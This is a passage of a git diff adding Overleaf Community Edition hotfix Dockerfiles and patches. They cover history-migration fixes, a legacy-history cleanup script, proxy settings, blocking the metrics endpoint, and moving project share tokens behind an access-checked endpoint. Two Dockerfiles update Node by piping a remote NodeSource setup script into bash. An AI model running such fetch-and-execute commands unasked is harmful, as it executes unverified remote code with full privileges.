+RUN patch -p0 < migrate_history_fixes.patch diff --git a/server-ce/hotfix/3.5.2/migrate_history_fixes.patch b/server-ce/hotfix/3.5.2/migrate_history_fixes.patch new file mode 100644 index 0000000..8fe97e1 --- /dev/null +++ b/server-ce/hotfix/3.5.2/migrate_history_fixes.patch @@ -0,0 +1,92 @@ +--- services/track-changes/app/js/DiffGenerator.js ++++ services/track-changes/app/js/DiffGenerator.js +@@ -63,6 +63,7 @@ module.exports = DiffGenerator = { + if (p > max_p) { + logger.warn({ max_p, p }, 'truncating position to content length') + p = max_p ++ op.p = p // fix out of range offsets to avoid invalid history exports in ZipManager + } + + const textToBeRemoved = content.slice(p, p + op.i.length) +@@ -74,6 +75,9 @@ module.exports = DiffGenerator = { + + return content.slice(0, p) + content.slice(p + op.i.length) + } else if (op.d != null) { ++ if (op.p > content.length) { ++ op.p = content.length // fix out of range offsets to avoid invalid history exports in ZipManager ++ } + return content.slice(0, op.p) + op.d + content.slice(op.p) + } else { + return content + +--- services/web/modules/history-migration/app/src/HistoryUpgradeHelper.js ++++ services/web/modules/history-migration/app/src/HistoryUpgradeHelper.js +@@ -107,6 +107,15 @@ async function upgradeProject(project, options) { + if (!upgradeFn) { + return { error: 'unsupported history type' } + } ++ if (options.forceClean) { ++ try { ++ const projectId = project._id ++ // delete any existing history stored in the mongo backend ++ await HistoryManager.promises.deleteProject(projectId, projectId) ++ } catch (err) { ++ // failed to delete existing history, but we can try to continue ++ } ++ } + const result = await upgradeFn(project, options) + result.historyType = historyType + return result + +--- services/web/scripts/history/migrate_history.js ++++ services/web/scripts/history/migrate_history.js +@@ -2,6 +2,25 @@ + process.env.MONGO_SOCKET_TIMEOUT = + parseInt(process.env.MONGO_SOCKET_TIMEOUT, 10) || 3600000 + ++const fs = require('fs') ++ ++if (fs.existsSync('/etc/container_environment.json')) { ++ try { ++ const envData = JSON.parse( ++ fs.readFileSync('/etc/container_environment.json', 'utf8') ++ ) ++ for (const [key, value] of Object.entries(envData)) { ++ process.env[key] = value ++ } ++ } catch (err) { ++ console.error( ++ 'cannot read /etc/container_environment.json, the script needs to be run as root', ++ err ++ ) ++ process.exit(1) ++ } ++} ++ + const VERSION = '0.9.0-cli' + const { + countProjects, +@@ -11,7 +30,6 @@ const { + } = require('../../modules/history-migration/app/src/HistoryUpgradeHelper') + const { waitForDb } = require('../../app/src/infrastructure/mongodb') + const minimist = require('minimist') +-const fs = require('fs') + const util = require('util') + const pLimit = require('p-limit') + const logger = require('@overleaf/logger') +@@ -34,6 +52,7 @@ const argv = minimist(process.argv.slice(2), { + 'use-query-hint', + 'retry-failed', + 'archive-on-failure', ++ 'force-clean', + ], + string: ['output', 'user-id'], + alias: { +@@ -168,6 +187,7 @@ async function migrateProjects(projectsToMigrate) { + convertLargeDocsToFile: argv['convert-large-docs-to-file'], + userId: argv['user-id'], + reason: VERSION, ++ forceClean: argv['force-clean'], + } + async function _migrateProject(project) { + if (INTERRUPT) { diff --git a/server-ce/hotfix/3.5.3/Dockerfile b/server-ce/hotfix/3.5.3/Dockerfile new file mode 100644 index 0000000..8b1ee4b --- /dev/null +++ b/server-ce/hotfix/3.5.3/Dockerfile @@ -0,0 +1,5 @@ +FROM 
sharelatex/sharelatex:3.5.2 + +# Patch: remove stats collection from history migration script +COPY remove_stats_collection.patch . +RUN patch -p0 < remove_stats_collection.patch diff --git a/server-ce/hotfix/3.5.3/remove_stats_collection.patch b/server-ce/hotfix/3.5.3/remove_stats_collection.patch new file mode 100644 index 0000000..3f4c7b6 --- /dev/null +++ b/server-ce/hotfix/3.5.3/remove_stats_collection.patch @@ -0,0 +1,16 @@ +--- services/web/scripts/history/migrate_history.js ++++ services/web/scripts/history/migrate_history.js +@@ -110,14 +110,6 @@ async function findProjectsToMigrate() { + process.exit(1) + } + +- // Find the total number of history records for the projects we need to migrate +- let docHistoryCount = 0 +- for await (const project of projectsToMigrate) { +- const count = await countDocHistory({ project_id: project._id }) +- docHistoryCount += count +- } +- +- console.log('Total history records to migrate:', docHistoryCount) + return projectsToMigrate + } diff --git a/server-ce/hotfix/3.5.4/Dockerfile b/server-ce/hotfix/3.5.4/Dockerfile new file mode 100644 index 0000000..b1e0c9a --- /dev/null +++ b/server-ce/hotfix/3.5.4/Dockerfile @@ -0,0 +1,5 @@ +FROM sharelatex/sharelatex:3.5.3 + +# Patch: run primary email check in saas only +COPY primary_email_check_saas.patch . +RUN patch -p0 < primary_email_check_saas.patch diff --git a/server-ce/hotfix/3.5.4/primary_email_check_saas.patch b/server-ce/hotfix/3.5.4/primary_email_check_saas.patch new file mode 100644 index 0000000..838fcb4 --- /dev/null +++ b/server-ce/hotfix/3.5.4/primary_email_check_saas.patch @@ -0,0 +1,10 @@ +--- services/web/app/src/Features/Project/ProjectController.js ++++ services/web/app/src/Features/Project/ProjectController.js +@@ -535,6 +535,7 @@ const ProjectController = { + + if ( + user && ++ Features.hasFeature('saas') && + UserPrimaryEmailCheckHandler.requiresPrimaryEmailCheck(user) + ) { + return res.redirect('/user/emails/primary-email-check') diff --git a/server-ce/hotfix/3.5.5/Dockerfile b/server-ce/hotfix/3.5.5/Dockerfile new file mode 100644 index 0000000..558ec0f --- /dev/null +++ b/server-ce/hotfix/3.5.5/Dockerfile @@ -0,0 +1,7 @@ +FROM sharelatex/sharelatex:3.5.4 + +# Patch: fix shutdown sequence: flush document-updater before history services. +RUN cd /etc/my_init.pre_shutdown.d \ +&& mv 02_flush_document_updater 01_flush_document_updater \ +&& mv 01_flush_project_history 02_flush_project_history \ +&& mv 01_flush_track_changes 02_flush_track_changes diff --git a/server-ce/hotfix/3.5.6/Dockerfile b/server-ce/hotfix/3.5.6/Dockerfile new file mode 100644 index 0000000..3c78fe9 --- /dev/null +++ b/server-ce/hotfix/3.5.6/Dockerfile @@ -0,0 +1,8 @@ +FROM sharelatex/sharelatex:3.5.5 + +# Patch: support trustProxyIps in Overleaf Community Edition/Server Pro +COPY trusted_proxy_ips.patch . 
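The 3.5.5 shutdown fix above works purely through file names: the pre-shutdown hooks in /etc/my_init.pre_shutdown.d run in lexical order, so renumbering moves the document-updater flush ahead of the two history flushes, letting pending edits land before project-history and track-changes drain their queues. A small sketch of that ordering rule (the hook names are the ones from the Dockerfile above):

const fs = require('fs')

// the init system walks the hook directory in sorted (lexical) order,
// so the numeric prefix alone decides the shutdown sequence
const hooks = fs.readdirSync('/etc/my_init.pre_shutdown.d').sort()
// after the renames: 01_flush_document_updater,
//                    02_flush_project_history, 02_flush_track_changes
for (const hook of hooks) {
  console.log('running pre-shutdown hook:', hook)
}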
+RUN patch -p0 --directory=/etc/sharelatex < trusted_proxy_ips.patch + +# Patch: add script to cleanup legacy history data +ADD clean_sl_history_data.js /overleaf/services/web/scripts/history/clean_sl_history_data.js diff --git a/server-ce/hotfix/3.5.6/clean_sl_history_data.js b/server-ce/hotfix/3.5.6/clean_sl_history_data.js new file mode 100644 index 0000000..1800692 --- /dev/null +++ b/server-ce/hotfix/3.5.6/clean_sl_history_data.js @@ -0,0 +1,60 @@ +const { waitForDb, db } = require('../../app/src/infrastructure/mongodb') + +async function main() { + await checkAllProjectsAreMigrated() + await setAllowDowngradeToFalse() + await deleteHistoryCollections() + console.log('Legacy history data cleaned up successfully') + process.exit(0) +} + +async function checkAllProjectsAreMigrated() { + console.log('checking all projects are migrated to Full Project History') + + const count = await db.projects.countDocuments({ + 'overleaf.history.display': { $ne: true }, + }) + + if (count === 0) { + console.log('All projects are migrated to Full Project History') + } else { + console.error( + `There are ${count} projects that are not migrated to Full Project History` + + ` please complete the migration before running this script again.` + ) + process.exit(1) + } +} + +async function setAllowDowngradeToFalse() { + console.log('unsetting `allowDowngrade` flag in all projects') + await db.projects.updateMany( + { + 'overleaf.history.id': { $exists: true }, + 'overleaf.history.allowDowngrade': true, + }, + { $unset: { 'overleaf.history.allowDowngrade': 1 } } + ) + console.log('unsetting `allowDowngrade` flag in all projects - Done') +} + +async function deleteHistoryCollections() { + console.log('removing `docHistory` data') + await db.docHistory.deleteMany({}) + console.log('removing `docHistory` data - Done') + + console.log('removing `docHistoryIndex` data') + await db.docHistoryIndex.deleteMany({}) + console.log('removing `docHistoryIndex` data - Done') + + console.log('removing `projectHistoryMetaData` data') + await db.projectHistoryMetaData.deleteMany({}) + console.log('removing `projectHistoryMetaData` data - Done') +} + +waitForDb() + .then(main) + .catch(err => { + console.error(err) + process.exit(1) + }) diff --git a/server-ce/hotfix/3.5.6/trusted_proxy_ips.patch b/server-ce/hotfix/3.5.6/trusted_proxy_ips.patch new file mode 100644 index 0000000..cdba9e3 --- /dev/null +++ b/server-ce/hotfix/3.5.6/trusted_proxy_ips.patch @@ -0,0 +1,10 @@ +--- settings.js ++++ settings.js +@@ -245,6 +245,7 @@ const settings = { + // address and http/https protocol information. + + behindProxy: process.env.SHARELATEX_BEHIND_PROXY || false, ++ trustedProxyIps: process.env.SHARELATEX_TRUSTED_PROXY_IPS, + + i18n: { + subdomainLang: { diff --git a/server-ce/hotfix/3.5.7/Dockerfile b/server-ce/hotfix/3.5.7/Dockerfile new file mode 100644 index 0000000..fed7904 --- /dev/null +++ b/server-ce/hotfix/3.5.7/Dockerfile @@ -0,0 +1,5 @@ +FROM sharelatex/sharelatex:3.5.6 + +# Patch: clean up history id on `migrate_history.js --force-clean` +COPY force_clean_fix.patch . 
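The trusted_proxy_ips.patch above only adds the setting; the web service is what ultimately feeds it to Express so that X-Forwarded-* headers are honoured solely when they come from listed proxies. A hedged sketch of how such a value is typically consumed (the actual wiring is not part of this diff):

const express = require('express')
const app = express()

// SHARELATEX_TRUSTED_PROXY_IPS takes a comma-separated list of addresses
// or CIDR ranges, which Express's 'trust proxy' setting accepts directly
const trustedProxyIps = process.env.SHARELATEX_TRUSTED_PROXY_IPS // e.g. '10.0.0.0/8,172.16.0.0/12'
if (process.env.SHARELATEX_BEHIND_PROXY) {
  app.set('trust proxy', trustedProxyIps || 1)
}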
+RUN patch -p0 < force_clean_fix.patch diff --git a/server-ce/hotfix/3.5.7/force_clean_fix.patch b/server-ce/hotfix/3.5.7/force_clean_fix.patch new file mode 100644 index 0000000..40cbf2a --- /dev/null +++ b/server-ce/hotfix/3.5.7/force_clean_fix.patch @@ -0,0 +1,40 @@ +--- services/web/modules/history-migration/app/src/HistoryUpgradeHelper.js ++++ services/web/modules/history-migration/app/src/HistoryUpgradeHelper.js +@@ -115,6 +115,11 @@ async function upgradeProject(project, options) { + const projectId = project._id + // delete any existing history stored in the mongo backend + await HistoryManager.promises.deleteProject(projectId, projectId) ++ // unset overleaf.history.id to prevent the migration script from failing on checks ++ await db.projects.updateOne( ++ { _id: projectId }, ++ { $unset: { 'overleaf.history.id': '' } } ++ ) + } catch (err) { + // failed to delete existing history, but we can try to continue + } +--- services/web/scripts/history/migrate_history.js ++++ services/web/scripts/history/migrate_history.js +@@ -147,7 +147,7 @@ async function migrateProjects(projectsToMigrate) { + } + // send log output for each migration to a file + const output = fs.createWriteStream(argv.output, { flags: 'a' }) +- console.log(`Writing log output to ${argv.output}`) ++ console.log(`Writing log output to ${process.cwd()}/${argv.output}`) + const logger = new console.Console({ stdout: output }) + function logJson(obj) { + logger.log(JSON.stringify(obj)) +@@ -253,8 +253,12 @@ async function main() { + console.log('Projects migrated: ', projectsMigrated) + console.log('Projects failed: ', projectsFailed) + if (projectsFailed > 0) { +- console.log(`Log output written to ${argv.output}`) +- console.log('Please check the log for errors.') ++ console.log('------------------------------------------------------') ++ console.log(`Log output written to ${process.cwd()}/${argv.output}`) ++ console.log( ++ 'Please check the log for errors. Attach the content of the file when contacting support.' ++ ) ++ console.log('------------------------------------------------------') + } + if (INTERRUPT) { + console.log('Migration interrupted, please run again to continue.') diff --git a/server-ce/hotfix/3.5.8/Dockerfile b/server-ce/hotfix/3.5.8/Dockerfile new file mode 100644 index 0000000..ea7b7f7 --- /dev/null +++ b/server-ce/hotfix/3.5.8/Dockerfile @@ -0,0 +1,5 @@ +FROM sharelatex/sharelatex:3.5.7 + +# Patch: fixes anonymous edits breaking history +COPY pr_13574.patch . +RUN patch -p0 < pr_13574.patch diff --git a/server-ce/hotfix/3.5.8/pr_13574.patch b/server-ce/hotfix/3.5.8/pr_13574.patch new file mode 100644 index 0000000..6d50715 --- /dev/null +++ b/server-ce/hotfix/3.5.8/pr_13574.patch @@ -0,0 +1,22 @@ +--- services/project-history/app/js/UpdateTranslator.js ++++ services/project-history/app/js/UpdateTranslator.js +@@ -73,9 +73,18 @@ function _convertToChange(projectId, updateWithBlob) { + throw error + } + ++ let v2Authors ++ if (update.meta.user_id === 'anonymous-user') { ++ // history-v1 uses null to represent an anonymous author ++ v2Authors = [null] ++ } else { ++ // user_id is missing on resync operations that update the contents of a doc ++ v2Authors = _.compact([update.meta.user_id]) ++ } ++ + const rawChange = { + operations, +- v2Authors: _.compact([update.meta.user_id]), ++ v2Authors, + timestamp: new Date(update.meta.ts).toISOString(), + projectVersion, + v2DocVersions: Object.keys(v2DocVersions).length ? 
v2DocVersions : null, diff --git a/server-ce/hotfix/3.5.9/Dockerfile b/server-ce/hotfix/3.5.9/Dockerfile new file mode 100644 index 0000000..d726a81 --- /dev/null +++ b/server-ce/hotfix/3.5.9/Dockerfile @@ -0,0 +1,10 @@ +FROM sharelatex/sharelatex:3.5.8 + +# Node update +RUN curl -sSL https://deb.nodesource.com/setup_16.x | bash - \ + && apt-get install -y nodejs + +# Patch: fetch access tokens via endpoint +COPY pr_13485.patch . +RUN patch -p0 < pr_13485.patch +RUN node genScript compile | bash diff --git a/server-ce/hotfix/3.5.9/pr_13485.patch b/server-ce/hotfix/3.5.9/pr_13485.patch new file mode 100644 index 0000000..14dc931 --- /dev/null +++ b/server-ce/hotfix/3.5.9/pr_13485.patch @@ -0,0 +1,389 @@ +--- services/web/app/src/Features/Collaborators/CollaboratorsController.js ++++ services/web/app/src/Features/Collaborators/CollaboratorsController.js +@@ -11,6 +11,7 @@ const Errors = require('../Errors/Errors') + const logger = require('@overleaf/logger') + const { expressify } = require('../../util/promises') + const { hasAdminAccess } = require('../Helpers/AdminAuthorizationHelper') ++const TokenAccessHandler = require('../TokenAccess/TokenAccessHandler') + + module.exports = { + removeUserFromProject: expressify(removeUserFromProject), +@@ -18,6 +19,7 @@ module.exports = { + getAllMembers: expressify(getAllMembers), + setCollaboratorInfo: expressify(setCollaboratorInfo), + transferOwnership: expressify(transferOwnership), ++ getShareTokens: expressify(getShareTokens), + } + + async function removeUserFromProject(req, res, next) { +@@ -114,3 +116,37 @@ async function _removeUserIdFromProject(projectId, userId) { + ) + await TagsHandler.promises.removeProjectFromAllTags(userId, projectId) + } ++ ++async function getShareTokens(req, res) { ++ const projectId = req.params.Project_id ++ const userId = SessionManager.getLoggedInUserId(req.session) ++ ++ let tokens ++ if (userId) { ++ tokens = await CollaboratorsGetter.promises.getPublicShareTokens( ++ ObjectId(userId), ++ ObjectId(projectId) ++ ) ++ } else { ++ // anonymous access, the token is already available in the session ++ const readOnly = TokenAccessHandler.getRequestToken(req, projectId) ++ tokens = { readOnly } ++ } ++ if (!tokens) { ++ return res.sendStatus(403) ++ } ++ ++ if (tokens.readOnly || tokens.readAndWrite) { ++ logger.info( ++ { ++ projectId, ++ userId: userId || 'anonymous', ++ ip: req.ip, ++ tokens: Object.keys(tokens), ++ }, ++ 'project tokens accessed' ++ ) ++ } ++ ++ res.json(tokens) ++} +--- services/web/app/src/Features/Collaborators/CollaboratorsGetter.js ++++ services/web/app/src/Features/Collaborators/CollaboratorsGetter.js +@@ -25,6 +25,7 @@ module.exports = { + getInvitedCollaboratorCount: callbackify(getInvitedCollaboratorCount), + getProjectsUserIsMemberOf: callbackify(getProjectsUserIsMemberOf), + isUserInvitedMemberOfProject: callbackify(isUserInvitedMemberOfProject), ++ getPublicShareTokens: callbackify(getPublicShareTokens), + userIsTokenMember: callbackify(userIsTokenMember), + getAllInvitedMembers: callbackify(getAllInvitedMembers), + promises: { +@@ -37,6 +38,7 @@ module.exports = { + getInvitedCollaboratorCount, + getProjectsUserIsMemberOf, + isUserInvitedMemberOfProject, ++ getPublicShareTokens, + userIsTokenMember, + getAllInvitedMembers, + }, +@@ -133,6 +135,40 @@ async function isUserInvitedMemberOfProject(userId, projectId) { + return false + } + ++async function getPublicShareTokens(userId, projectId) { ++ const memberInfo = await Project.findOne( ++ { ++ _id: projectId, ++ }, ++ { ++ isOwner: 
{ $eq: ['$owner_ref', userId] }, ++ hasTokenReadOnlyAccess: { ++ $and: [ ++ { $in: [userId, '$tokenAccessReadOnly_refs'] }, ++ { $eq: ['$publicAccesLevel', PublicAccessLevels.TOKEN_BASED] }, ++ ], ++ }, ++ tokens: 1, ++ } ++ ) ++ .lean() ++ .exec() ++ ++ if (!memberInfo) { ++ return null ++ } ++ ++ if (memberInfo.isOwner) { ++ return memberInfo.tokens ++ } else if (memberInfo.hasTokenReadOnlyAccess) { ++ return { ++ readOnly: memberInfo.tokens.readOnly, ++ } ++ } else { ++ return {} ++ } ++} ++ + async function getProjectsUserIsMemberOf(userId, fields) { + const limit = pLimit(2) + const [readAndWrite, readOnly, tokenReadAndWrite, tokenReadOnly] = +--- services/web/app/src/Features/Collaborators/CollaboratorsRouter.js ++++ services/web/app/src/Features/Collaborators/CollaboratorsRouter.js +@@ -22,6 +22,10 @@ const rateLimiters = { + points: 200, + duration: 60 * 10, + }), ++ getProjectTokens: new RateLimiter('get-project-tokens', { ++ points: 200, ++ duration: 60 * 10, ++ }), + } + + module.exports = { +@@ -139,5 +143,12 @@ module.exports = { + CollaboratorsInviteController.acceptInvite, + AnalyticsRegistrationSourceMiddleware.clearSource() + ) ++ ++ webRouter.get( ++ '/project/:Project_id/tokens', ++ RateLimiterMiddleware.rateLimit(rateLimiters.getProjectTokens), ++ AuthorizationMiddleware.ensureUserCanReadProject, ++ CollaboratorsController.getShareTokens ++ ) + }, + } +--- services/web/app/src/Features/Editor/EditorController.js ++++ services/web/app/src/Features/Editor/EditorController.js +@@ -581,20 +581,7 @@ const EditorController = { + { newAccessLevel } + ) + if (newAccessLevel === PublicAccessLevels.TOKEN_BASED) { +- ProjectDetailsHandler.ensureTokensArePresent( +- projectId, +- function (err, tokens) { +- if (err) { +- return callback(err) +- } +- EditorRealTimeController.emitToRoom( +- projectId, +- 'project:tokens:changed', +- { tokens } +- ) +- callback() +- } +- ) ++ ProjectDetailsHandler.ensureTokensArePresent(projectId, callback) + } else { + callback() + } +--- services/web/app/src/Features/Editor/EditorHttpController.js ++++ services/web/app/src/Features/Editor/EditorHttpController.js +@@ -67,8 +67,6 @@ async function joinProject(req, res, next) { + if (!project) { + return res.sendStatus(403) + } +- // Hide access tokens if this is not the project owner +- TokenAccessHandler.protectTokens(project, privilegeLevel) + // Hide sensitive data if the user is restricted + if (isRestrictedUser) { + project.owner = { _id: project.owner._id } +--- services/web/app/src/Features/Project/ProjectController.js ++++ services/web/app/src/Features/Project/ProjectController.js +@@ -343,7 +343,7 @@ const ProjectController = { + const userId = SessionManager.getLoggedInUserId(req.session) + ProjectGetter.findAllUsersProjects( + userId, +- 'name lastUpdated publicAccesLevel archived trashed owner_ref tokens', ++ 'name lastUpdated publicAccesLevel archived trashed owner_ref', + (err, projects) => { + if (err != null) { + return next(err) +@@ -1072,7 +1072,6 @@ const ProjectController = { + // If a project is simultaneously trashed and archived, we will consider it archived but not trashed. 
+ const trashed = ProjectHelper.isTrashed(project, userId) && !archived + +- TokenAccessHandler.protectTokens(project, accessLevel) + const model = { + id: project._id, + name: project.name, +--- services/web/app/src/Features/Project/ProjectDetailsHandler.js ++++ services/web/app/src/Features/Project/ProjectDetailsHandler.js +@@ -207,14 +207,13 @@ async function ensureTokensArePresent(projectId) { + project.tokens.readOnly != null && + project.tokens.readAndWrite != null + ) { +- return project.tokens ++ return + } + await _generateTokens(project) + await Project.updateOne( + { _id: projectId }, + { $set: { tokens: project.tokens } } + ).exec() +- return project.tokens + } + + async function clearTokens(projectId) { +--- services/web/app/src/Features/Project/ProjectEditorHandler.js ++++ services/web/app/src/Features/Project/ProjectEditorHandler.js +@@ -49,7 +49,6 @@ module.exports = ProjectEditorHandler = { + ), + members: [], + invites, +- tokens: project.tokens, + imageName: + project.imageName != null + ? Path.basename(project.imageName) +--- services/web/app/src/Features/TokenAccess/TokenAccessHandler.js ++++ services/web/app/src/Features/TokenAccess/TokenAccessHandler.js +@@ -246,22 +246,6 @@ const TokenAccessHandler = { + }) + }, + +- protectTokens(project, privilegeLevel) { +- if (!project || !project.tokens) { +- return +- } +- if (privilegeLevel === PrivilegeLevels.OWNER) { +- return +- } +- if (privilegeLevel !== PrivilegeLevels.READ_AND_WRITE) { +- project.tokens.readAndWrite = '' +- project.tokens.readAndWritePrefix = '' +- } +- if (privilegeLevel !== PrivilegeLevels.READ_ONLY) { +- project.tokens.readOnly = '' +- } +- }, +- + getV1DocPublishedInfo(token, callback) { + // default to allowing access + if (!Settings.apis.v1 || !Settings.apis.v1.url) { +@@ -304,7 +288,6 @@ TokenAccessHandler.promises = promisifyAll(TokenAccessHandler, { + '_projectFindOne', + 'grantSessionTokenAccess', + 'getRequestToken', +- 'protectTokens', + ], + multiResult: { + validateTokenForAnonymousAccess: ['isValidReadAndWrite', 'isValidReadOnly'], +--- services/web/frontend/js/features/share-project-modal/components/link-sharing.js ++++ services/web/frontend/js/features/share-project-modal/components/link-sharing.js +@@ -1,4 +1,4 @@ +-import { useCallback, useState } from 'react' ++import { useCallback, useState, useEffect } from 'react' + import PropTypes from 'prop-types' + import { Button, Col, Row } from 'react-bootstrap' + import { Trans } from 'react-i18next' +@@ -10,6 +10,8 @@ import CopyLink from '../../../shared/components/copy-link' + import { useProjectContext } from '../../../shared/context/project-context' + import * as eventTracking from '../../../infrastructure/event-tracking' + import { useUserContext } from '../../../shared/context/user-context' ++import { getJSON } from '../../../infrastructure/fetch-json' ++import useAbortController from '../../../shared/hooks/use-abort-controller' + + export default function LinkSharing({ canAddCollaborators }) { + const [inflight, setInflight] = useState(false) +@@ -27,8 +29,7 @@ export default function LinkSharing({ canAddCollaborators }) { + ) + .then(() => { + // NOTE: not calling `updateProject` here as it receives data via +- // project:publicAccessLevel:changed and project:tokens:changed +- // over the websocket connection ++ // project:publicAccessLevel:changed over the websocket connection + // TODO: eventTracking.sendMB('project-make-token-based') when newPublicAccessLevel is 'tokenBased' + }) + .finally(() => { +@@ -106,7 +107,17 @@ 
PrivateSharing.propTypes = { + } + + function TokenBasedSharing({ setAccessLevel, inflight, canAddCollaborators }) { +- const { tokens } = useProjectContext() ++ const { _id: projectId } = useProjectContext() ++ ++ const [tokens, setTokens] = useState(null) ++ ++ const { signal } = useAbortController() ++ ++ useEffect(() => { ++ getJSON(`/project/${projectId}/tokens`, { signal }) ++ .then(data => setTokens(data)) ++ .catch(error => console.error(error)) ++ }, [projectId, signal]) + + return ( + +@@ -194,7 +205,17 @@ LegacySharing.propTypes = { + } + + export function ReadOnlyTokenLink() { +- const { tokens } = useProjectContext() ++ const { _id: projectId } = useProjectContext() ++ ++ const [tokens, setTokens] = useState(null) ++ ++ const { signal } = useAbortController() ++ ++ useEffect(() => { ++ getJSON(`/project/${projectId}/tokens`, { signal }) ++ .then(data => setTokens(data)) ++ .catch(error => console.error(error)) ++ }, [projectId, signal]) + + return ( + +--- services/web/frontend/js/features/share-project-modal/controllers/react-share-project-modal-controller.js ++++ services/web/frontend/js/features/share-project-modal/controllers/react-share-project-modal-controller.js +@@ -31,16 +31,6 @@ export default App.controller( + }) + } + +- /* tokens */ +- +- ide.socket.on('project:tokens:changed', data => { +- if (data.tokens != null) { +- $scope.$applyAsync(() => { +- $scope.project.tokens = data.tokens +- }) +- } +- }) +- + ide.socket.on('project:membership:changed', data => { + if (data.members) { + listProjectMembers($scope.project._id) +--- services/web/frontend/js/shared/context/mock/mock-ide.js ++++ services/web/frontend/js/shared/context/mock/mock-ide.js +@@ -27,10 +27,6 @@ export const getMockIde = () => { + zotero: false, + }, + publicAccessLevel: '', +- tokens: { +- readOnly: '', +- readAndWrite: '', +- }, + owner: { + _id: '', + email: '', +--- services/web/frontend/js/shared/context/project-context.js ++++ services/web/frontend/js/shared/context/project-context.js +@@ -28,10 +28,6 @@ export const projectShape = { + versioning: PropTypes.bool, + }), + publicAccessLevel: PropTypes.string, +- tokens: PropTypes.shape({ +- readOnly: PropTypes.string, +- readAndWrite: PropTypes.string, +- }), + owner: PropTypes.shape({ + _id: PropTypes.string.isRequired, + email: PropTypes.string.isRequired, +@@ -81,7 +77,6 @@ export function ProjectProvider({ children }) { + invites, + features, + publicAccesLevel: publicAccessLevel, +- tokens, + owner, + } = project || projectFallback + +@@ -94,7 +89,6 @@ export function ProjectProvider({ children }) { + invites, + features, + publicAccessLevel, +- tokens, + owner, + } + }, [ +@@ -105,7 +99,6 @@ export function ProjectProvider({ children }) { + invites, + features, + publicAccessLevel, +- tokens, + owner, + ]) diff --git a/server-ce/hotfix/4.0.1/Dockerfile b/server-ce/hotfix/4.0.1/Dockerfile new file mode 100644 index 0000000..95d0536 --- /dev/null +++ b/server-ce/hotfix/4.0.1/Dockerfile @@ -0,0 +1,9 @@ +FROM sharelatex/sharelatex:4.0.0 + +# Patch: Block access to metrics endpoint +COPY pr_13229_ce_only.patch . +RUN patch -p0 --directory=/ < pr_13229_ce_only.patch + +# Patch: Remove documentation link from editor outline +COPY outline_doc_icon.patch . 
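The front-end half of pr_13485 above stops reading tokens from the project context (which no longer carries them) and instead fetches them on demand from the new GET /project/:Project_id/tokens endpoint, aborting the request if the component unmounts first. A condensed sketch of the pattern using plain fetch (the real code goes through Overleaf's getJSON helper and useAbortController hook):

import { useEffect, useState } from 'react'

function useShareTokens(projectId) {
  const [tokens, setTokens] = useState(null)

  useEffect(() => {
    const controller = new AbortController()
    // tokens are only fetched when the sharing UI actually needs them
    fetch(`/project/${projectId}/tokens`, { signal: controller.signal })
      .then(response => response.json())
      .then(data => setTokens(data))
      .catch(error => console.error(error))
    // abort on unmount so we never set state on an unmounted component
    return () => controller.abort()
  }, [projectId])

  return tokens
}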
+RUN patch -p0 < outline_doc_icon.patch diff --git a/server-ce/hotfix/4.0.1/outline_doc_icon.patch b/server-ce/hotfix/4.0.1/outline_doc_icon.patch new file mode 100644 index 0000000..847cfde --- /dev/null +++ b/server-ce/hotfix/4.0.1/outline_doc_icon.patch @@ -0,0 +1,9 @@ +--- services/web/app/views/project/editor/file-tree-react.pug ++++ services/web/app/views/project/editor/file-tree-react.pug +@@ -38,5 +38,3 @@ aside.editor-sidebar.full-size + highlighted-line="highlightedLine" + show="show" + ) +- +- documentation-button +\ No newline at end of file diff --git a/server-ce/hotfix/4.0.1/pr_13229_ce_only.patch b/server-ce/hotfix/4.0.1/pr_13229_ce_only.patch new file mode 100644 index 0000000..9bb134f --- /dev/null +++ b/server-ce/hotfix/4.0.1/pr_13229_ce_only.patch @@ -0,0 +1,14 @@ +--- etc/nginx/sites-enabled/sharelatex.conf ++++ etc/nginx/sites-enabled/sharelatex.conf +@@ -4,6 +4,11 @@ server { + + root /overleaf/services/web/public/; + ++ # block external access to prometheus /metrics ++ location /metrics { ++ internal; ++ } ++ + location / { + proxy_pass http://127.0.0.1:3000; + proxy_http_version 1.1; diff --git a/server-ce/hotfix/4.0.3/Dockerfile b/server-ce/hotfix/4.0.3/Dockerfile new file mode 100644 index 0000000..02199b7 --- /dev/null +++ b/server-ce/hotfix/4.0.3/Dockerfile @@ -0,0 +1,7 @@ +# 4.0.1 was tagged as 4.0.2 in dockerhub to keep parity with Server Pro +FROM sharelatex/sharelatex:4.0.1 + + +# Patch: fixes anonymous edits breaking history +COPY pr_13574.patch . +RUN patch -p0 < pr_13574.patch diff --git a/server-ce/hotfix/4.0.3/pr_13574.patch b/server-ce/hotfix/4.0.3/pr_13574.patch new file mode 100644 index 0000000..6d50715 --- /dev/null +++ b/server-ce/hotfix/4.0.3/pr_13574.patch @@ -0,0 +1,22 @@ +--- services/project-history/app/js/UpdateTranslator.js ++++ services/project-history/app/js/UpdateTranslator.js +@@ -73,9 +73,18 @@ function _convertToChange(projectId, updateWithBlob) { + throw error + } + ++ let v2Authors ++ if (update.meta.user_id === 'anonymous-user') { ++ // history-v1 uses null to represent an anonymous author ++ v2Authors = [null] ++ } else { ++ // user_id is missing on resync operations that update the contents of a doc ++ v2Authors = _.compact([update.meta.user_id]) ++ } ++ + const rawChange = { + operations, +- v2Authors: _.compact([update.meta.user_id]), ++ v2Authors, + timestamp: new Date(update.meta.ts).toISOString(), + projectVersion, + v2DocVersions: Object.keys(v2DocVersions).length ? v2DocVersions : null, diff --git a/server-ce/hotfix/4.0.4/Dockerfile b/server-ce/hotfix/4.0.4/Dockerfile new file mode 100644 index 0000000..a1d86ae --- /dev/null +++ b/server-ce/hotfix/4.0.4/Dockerfile @@ -0,0 +1,10 @@ +FROM sharelatex/sharelatex:4.0.3 + +# Node update +RUN curl -sSL https://deb.nodesource.com/setup_16.x | bash - \ + && apt-get install -y nodejs + +# Patch: fetch access tokens via endpoint +COPY pr_13485.patch . 
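pr_13574 above, applied to both the 3.5.8 and 4.0.3 images, normalises authorship before a change reaches history-v1: real-time tags anonymous editors with the sentinel string 'anonymous-user', which previously slipped through _.compact as if it were a real user id and broke history processing, while resync updates carry no user_id at all. A sketch of the resulting mapping (toV2Authors is a made-up helper name; the logic sits inline in _convertToChange):

const _ = require('lodash')

function toV2Authors(userId) {
  if (userId === 'anonymous-user') {
    return [null] // history-v1 uses null to represent an anonymous author
  }
  return _.compact([userId]) // drops the undefined user_id of resync updates
}

toV2Authors('anonymous-user') // => [null]
toV2Authors(undefined)        // => []
toV2Authors('a1b2c3')         // => ['a1b2c3'] (hypothetical user id)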
